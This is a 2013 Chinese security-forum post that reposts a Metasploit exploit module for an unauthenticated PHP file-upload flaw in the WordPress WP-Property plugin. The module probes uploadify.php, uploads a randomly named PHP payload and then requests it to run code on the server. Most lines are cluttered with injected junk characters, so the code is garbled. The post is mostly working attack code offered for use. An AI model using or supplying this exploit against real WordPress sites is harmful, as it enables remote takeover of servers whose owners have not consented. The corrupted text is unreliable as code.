找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2363|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞' S8 q2 `" i* z- h
* p, X, ~7 p1 a
## # This file is part of the Metasploit Framework and may be subject to
" w5 s3 ^8 V0 _+ o3 ~  o! N
' N' h+ j) O3 v  X# redistribution and commercial restrictions. Please see the Metasploit0 ]2 I7 ]% n! y7 G5 Q9 x
/ E6 d# X. l0 `
# Framework web site for more information on licensing and terms of use.: U# x( E% s, T

- E+ h8 F5 M. @; `#   http://metasploit.com/framework/ ##; N1 N: f: C" y+ T5 R# _- B

4 j" g/ h2 L' P/ c" p& e5 C" V $ N8 O* _( c) ]+ r( R. m0 S
$ @: o* _0 q, F

1 z/ ^6 L/ d( Y* D- c: g4 w: A: r9 M( C' i% V& x7 x+ _! C
require 'msf/core'+ X; j% T8 B/ Q6 N: n
require 'msf/core/exploit/php_exe'
/ k$ c7 D+ j  o' T9 y1 i2 x; ~! v/ k8 O0 i
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
# H/ o9 u( h* b'Description'    => %q{
+ W$ i" }1 `) q, h1 i$ S; G8 gThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
3 n3 ?( X$ E+ M8 Z8 t1 ][
2 W3 K& o$ d7 g2 I'Sammy FORGIT', # initial discovery" {  i) ]% T1 C1 |, a& ]7 G: ?2 o
'James Fitts <fitts.james[at]gmail.com>' # metasploit module* j4 b8 d8 q0 H6 l. U
],- X2 D9 N% _( [7 L5 @
'License'        => MSF_LICENSE,
0 `: a' d) _$ g9 Y1 o'References'     =>
! ~0 Z8 W  G7 e[
% M% K6 y6 Z+ o/ n0 L% W' t[ 'OSVDB', '82656' ],0 l* v! q* f  k1 c# k
[ 'BID', '53787' ],1 _. _- F* T( g* D" V
[ 'EDB', '18987'],
% f! K7 k6 {2 v8 Q" ?[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]2 q2 t5 L% d0 {! q  j9 N+ `8 |, x
],
7 n- p- ?6 R; U/ i& K+ ~  ~3 A7 q'Payload'        =>  k" l: \; o, ]7 |0 g3 T
{
9 j) O; R' ?' p$ l! c9 R" G  Q" m  L'BadChars' => "\x00",! y8 w- {& w1 U$ o/ u
},
0 u+ Q% a0 `) \  C2 d'Platform'       => 'php',: o9 p. L" c2 b: {
'Arch'           => ARCH_PHP,
% y9 B+ j& y# z0 n'Targets'        =>& I( W+ k+ s& L
[/ j$ o& e7 a0 p7 K. g
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. J7 Z* C+ P3 B# I6 A$ ~( I
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 F6 @8 Z' K2 K1 E1 u+ n9 W5 d' `],
6 G' H9 ?# ~2 z2 _/ ~( c- i6 o'DefaultTarget'  => 0,
# V8 L) ]" |; r# `( m. N7 `'DisclosureDate' => 'Mar 26 2012'))3 I3 ^) R: ?" ]9 L, v

' h- h4 e6 {' {, m9 X3 P  nregister_options(
+ F4 h8 M0 t. r. Y# g* |- I& z[
6 M0 m; V" T1 X$ g/ o$ P$ `# x6 y. SOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
6 d3 j- ~( Q7 Y4 i8 w. K+ Y- j], self.class)
& p( P" P, E' {: `end
, T& \$ j( |- J# h$ d; A
) d8 Q$ n# w' U# x! k' kdef check/ _) I' q: `9 i$ t, Q' d2 O
uri =  target_uri.path
3 K: @7 b+ o; t- T8 zuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
8 Z' \  \3 o" j6 R* o- {2 o'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"/ J; n' D9 h8 s. k9 U* L) p
})7 u6 S/ }" O- P- F! ?4 f% F4 o
8 _$ o) k  S& O" B6 @
if not res or res.code != 200
+ s- h# q: ?5 B/ Y1 O) Z* T* _return Exploit::CheckCode::Unknown# @/ m5 L. E& Y6 o) W% N
end9 G8 F$ L) y" p9 E7 c, i$ {

6 s* `1 [, {  |2 s: J  r+ |return Exploit::CheckCode::Appears
6 ~% d* R3 J; R6 `. O6 f+ f% v2 Q5 D5 gend
9 T6 @! ]; M9 s- p- w2 ^+ v% x! P' l' e
def exploit
  B, i  k0 ?9 G9 Turi =  target_uri.path/ H! d4 n( S' F0 O/ l
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
! g! K# C. |& t+ q0 M3 A1 ^; I1 T7 l9 p" y; s3 K' Z( q1 |
data = Rex::MIME::Message.new
1 k- U1 a% @) Y, k, a4 U  y* r# }' ?data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
( ^$ B3 `# I. T! I2 N8 ^0 C. J  }data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
% J8 s( O* E% Y9 I& w! ^post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 T2 T, Q- r1 p# \& }  X% m/ Y9 J( M5 R9 q, Y
print_status("#{peer} - Uploading payload #{@payload_name}")
/ L' {3 U  X! o' r' rres = send_request_cgi({9 e% ]1 g8 g. I) Y
'method' => 'POST',
6 g# [6 x& J7 ?/ \% X'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
5 C3 R- w, a+ F. d6 k5 A. n'ctype'  => "multipart/form-data; boundary=#{data.bound}",# q# G# {8 o" f; c9 e4 B5 D
'data'   => post_data
' d/ v! H$ I; D* a})
2 E8 z2 W* k+ |
, E5 u  b) G+ D+ p1 g0 aif not res or res.code != 200 or res.body !~ /#{@payload_name}/1 c: Q7 {, }1 q& k3 @; V- `. D
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")3 X! j5 @5 x5 Q6 T: n7 B
end
4 i6 s- |, I3 K  V4 f- Z3 i0 q5 s7 ]7 Z$ g5 i' n! }; m
upload_uri = res.body7 g8 b& `9 [$ M6 `/ K! b( Y% q
6 Y3 R1 w' p6 H1 W; |
print_status("#{peer} - Executing payload #{@payload_name}")/ @3 Q1 C" x1 ?  O. z
res = send_request_raw({
( a7 a$ d# N3 I* l* R* R% Z/ M3 e'uri'    => upload_uri,
' c- ~& g$ W; N$ k  t'method' => 'GET'7 r! s2 b+ X3 u, x" c" M9 p2 [- d
})
1 q9 _- X( p! w4 Mend
2 t- q" l' U' Aend
( ~+ N& k% d# l$ x  e3 a6 u6 Z2 i4 X. Y3 a+ e! e7 |  h! Y
不要问我这写的是什么 怎么利用 我是说msf.9 h4 u/ d4 S7 E& V, ^3 j
) b- @; M# O, W- T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表